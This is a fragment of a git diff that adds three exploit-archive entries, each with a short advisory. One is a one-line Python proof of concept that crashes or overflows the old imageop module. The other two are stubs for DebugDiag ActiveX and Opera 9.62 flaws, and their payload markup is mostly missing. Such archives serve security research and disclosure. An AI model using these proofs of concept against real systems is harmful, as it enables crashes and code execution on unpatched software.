\ No newline at end of file
diff --git a/platforms/unix/dos/32534.py b/platforms/unix/dos/32534.py
new file mode 100755
index 000000000..8a4276a9e
--- /dev/null
+++ b/platforms/unix/dos/32534.py
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/31932/info
+
+Python's 'imageop' module is prone to a buffer-overflow vulnerability.
+
+Successful exploits may allow attackers to execute arbitrary code in the context of applications using the vulnerable Python modules. This may result in a compromise of the underlying system. Failed attempts may lead to a denial-of-service condition.
+
+These issues affect versions prior to Python 2.5.2-r6.
+
+import imageop
+s = ''
+imageop.crop(s, 1, 65536, 65536, 0, 0, 65536, 65536)
\ No newline at end of file
diff --git a/platforms/windows/dos/32550.html b/platforms/windows/dos/32550.html
new file mode 100755
index 000000000..914d93c43
--- /dev/null
+++ b/platforms/windows/dos/32550.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31996/info
+
+Microsoft DebugDiag 'CrashHangExt.dll' ActiveX control is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error.
+
+A successful attack allows a remote attacker to crash the application using the ActiveX control (typically Internet Explorer), denying further service to legitimate users.
+
+Microsoft DebugDiag 1.0 is vulnerable; other versions may also be affected.
+
+
\ No newline at end of file
diff --git a/platforms/windows/remote/32555.html b/platforms/windows/remote/32555.html
new file mode 100755
index 000000000..fd768036e
--- /dev/null
+++ b/platforms/windows/remote/32555.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/32015/info
+
+Opera Web Browser is prone to an input-validation vulnerability because of the way it stores data used for the History Search feature.
+
+Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, obtain sensitive information, alter the browser's configuration settings, or execute local programs in the context of the browser; other attacks are also possible.
+
+Opera Web Browser 9.62 is vulnerable.
+
+ Click me...(opera:config) Click me...(opera:cache) Click me...(opera:debug) Click me...(opera:plugins) Click me...(opera:about)
\ No newline at end of file